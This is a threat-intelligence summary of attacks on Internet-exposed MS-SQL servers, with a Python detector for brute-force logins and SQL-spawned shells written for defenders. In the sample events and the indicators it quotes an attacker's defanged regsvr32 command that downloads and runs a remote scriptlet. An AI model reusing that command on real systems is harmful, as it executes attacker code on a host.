AhnLab EDR Detects Attacks Targeting MS-SQL Servers

MS-SQL servers exposed to the Internet are commonly scanned and attacked using brute force or dictionary attacks to gain administrator access, enabling threat actors to install malware and take control of the system. ASEC blog cases show TargetCompany’s Mallox ransomware and Remcos RAT spread via MS-SQL, with other actors such as LemonDuck, Kingminer, Vollgar CoinMiner, Trigona, Cobalt Strike, Proxyware, and Andariel leveraging this vector. #Mallox #Remcos #LemonDuck #Kingminer #VollgarCoinMiner #Trigona #CobaltStrike #Proxyware #Andariel #NukeSped #MS-SQL

Keypoints

  • MS-SQL servers are targeted via port 1433, with brute force or dictionary attacks to obtain sa/admin privileges.
  • LemonDuck can propagate by self-spreading to poorly managed MS-SQL servers, sometimes without prior scanning.
  • Malware gains OS command execution rights through MS-SQL features like xp_cmdshell, OLE Automation Procedures, and CLR stored procedures.
  • AhnLab EDR detects key behaviors including sa logins, brute force/dictionary login failures, and MS-SQL executing OS commands for early warning.
  • A range of actors, including ransomware operators, CoinMiner campaigns, and APT groups, target MS-SQL servers; in some cases Andariel deployed the NukeSped backdoor this way.
  • Administrators should use strong passwords and rotate them periodically, apply patches, and firewall MS-SQL so that it is not exposed to the Internet, restricting attacker access.
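A minimal form of the detection behaviors listed above (a burst of failed logins against the MS-SQL server followed by a successful sa login from the same client, and sqlservr.exe spawning a command interpreter, which is how xp_cmdshell, OLE Automation and CLR procedures look at the OS level), written here as an added Python example that is not AhnLab's code. The ERRORLOG excerpt and process-creation records are constructed, the threshold of 3 failures is arbitrary, and the logon line format is assumed to match SQL Server's default "Login failed for user" / "Login succeeded for user" messages.

```python
import re
from collections import Counter

# Constructed sample lines in the shape of an MS-SQL ERRORLOG (not real data).
ERRORLOG = """\
2024-05-01 09:12:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-05-01 09:12:01.40 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-05-01 09:12:01.70 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-05-01 09:12:02.00 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2024-05-01 09:12:02.30 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 203.0.113.5]
2024-05-01 09:30:00.00 Logon       Login failed for user 'app_ro'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.7]
"""

# Constructed process-creation records: (parent image, child image, command line).
PROC_EVENTS = [
    ("sqlservr.exe", "cmd.exe", "cmd.exe /c regsvr32 /u /s /i:hxxp://js.f4321y[.]com:280/v.sct scrobj.dll"),
    ("sqlservr.exe", "SQLDumper.exe", "SQLDumper.exe 0 0 0x0"),  # legitimate child of SQL Server
    ("explorer.exe", "cmd.exe", "cmd.exe /c dir"),               # shell, but not from SQL Server
]

LOGON_RE = re.compile(
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']+)'.*\[CLIENT: (?P<client>[^\]]+)\]")
# Children of sqlservr.exe that indicate OS command execution (xp_cmdshell, OLE Automation, CLR).
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "regsvr32.exe", "rundll32.exe", "mshta.exe"}

def parse_logon_events(text):
    """Yield (client, user, succeeded) for every logon line in an ERRORLOG excerpt."""
    for m in LOGON_RE.finditer(text):
        yield m["client"], m["user"], m["result"] == "succeeded"

def detect_brute_force(text, threshold=3):
    """Flag clients with >= threshold failed logins; record whether 'sa' then logged in from there."""
    failures, sa_success = Counter(), set()
    for client, user, ok in parse_logon_events(text):
        if not ok:
            failures[client] += 1
        elif user == "sa" and failures[client] >= threshold:
            sa_success.add(client)  # success after a burst of failures: likely guessed password
    return {c: {"failures": n, "sa_login_after_failures": c in sa_success}
            for c, n in failures.items() if n >= threshold}

def detect_sql_spawned_shells(events):
    """Return (child, command line) for shells/script hosts spawned directly by sqlservr.exe."""
    return [(child, cmdline) for parent, child, cmdline in events
            if parent.lower() == "sqlservr.exe" and child.lower() in SHELL_CHILDREN]

if __name__ == "__main__":
    print(detect_brute_force(ERRORLOG))
    print(detect_sql_spawned_shells(PROC_EVENTS))
```

On a real host the same logic applies to the ERRORLOG file under the SQL Server LOG directory and to Sysmon or EDR process-creation telemetry, with the client IP and the child command line being the fields worth alerting on.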

MITRE Techniques

  • [T1110] Brute Force – Attacker logs in to the MS-SQL server through brute force or dictionary attacks. “they attempt to log in to the confirmed MS-SQL server through brute force or dictionary attacks.”
  • [T1059] Command and Scripting Interpreter – Windows Command Shell (xp_cmdshell) used to execute OS commands. “xp_cmdshell commands provide a feature that executes commands received as arguments in Windows shell.”
  • [T1218] Signed Binary Proxy Execution – OLE Automation Procedures and CLR stored procedures used to execute malicious commands. “The method that uses the OLE stored procedure involves exploiting OLE’s feature to execute other applications.” “The CLR stored procedure is similar to the extended stored procedure, but it can be distinguished by its use of .NET DLLs.”

Indicators of Compromise

  • [Port] 1433 – scanning for and accessing MS-SQL servers via port 1433; example: “scanning for servers with the 1433 port open.”
  • [Domain] js.f4321y[.]com – used in a regsvr32 delivery line: “regsvr32 /u /s /i:hxxp://js.f4321y[.]com:280/v.sct scrobj.dll”
  • [File] scrobj.dll – referenced in the same regsvr32 delivery command line

Read more: https://asec.ahnlab.com/en/66282/